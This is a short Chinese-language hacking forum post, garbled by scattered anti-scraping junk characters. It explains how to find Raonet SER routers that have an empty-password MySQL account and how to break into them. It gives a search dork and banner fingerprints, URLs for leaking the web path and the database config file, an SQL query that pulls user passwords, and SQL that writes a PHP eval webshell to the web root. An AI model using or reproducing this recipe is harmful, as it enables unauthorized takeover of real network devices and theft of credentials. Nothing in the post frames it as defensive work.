寻找存在漏洞的路由器方法:
/ n2 H9 Y! N) b+ Z2 G4 R: G! y' C
1:google搜索'Raonet Subscriber Ethernet Router'
, M8 j# X1 ~4 R- d; a& V) m, }, D( |* o `0 o7 O; \
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
2 H% `9 _$ a2 v6 \; ~4 M
) _6 t$ c8 n, o' q* W7 ?3 z3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
* b8 o" }) A: s3 z7 f. r2 p6 J; a4 q/ I0 ?0 k" f
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 \% f; H8 d) ]* R2 A2 L% ?
% H7 X6 |( x1 [7 g
$ Q: A) M0 ^* b7 C @/ R e
; W5 j' z# \& n9 o* J; [入侵步骤:
+ S/ m+ u# P2 g: [1 A) p$ ^$ ^6 _( V2 u' u1 k% g* W
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php+ q8 T! w# |' k6 q
# p8 ^. W* r1 e% M) `2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc1 L+ N' V0 M4 f$ ]$ \
3:得到密码后连接,查看GUI管理密码:9 }+ e7 U; d" u4 S) r- V
use ser_500- o, b2 u3 m" Y4 i4 a. Z, w
select id,passwd from user;
) y3 U- Y9 ^, }& t% t$ c7 {. L4:通过数据库写入webshell,执行命令:0 A- k8 t1 A, T
use mysql;
+ n4 J9 q+ ]% X. Ncreate table ok(cmd TEXT);
7 E- `) W0 I. ?/ o I T7 k2 ?insert into ok values("<?php @eval($_POST[cmd])?>");
8 q$ w& ]$ z( G/ zselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";: \% k. `/ u- f e! N. k
drop table ok;
5 ^9 ]8 B* ?0 ]+ w7 o# K- B
& \6 I8 w7 E8 [8 }. P" ~* {6 E5:连接后门shell.php
A) H) a1 S& \" T2 N
# N$ T Q+ \+ {% B+ G2 V+ t) }- Y6. 搞定!* ~% c- b4 M% S- ]
( f% ?$ F7 s! F/ i6 g3 L) { ?3 |
|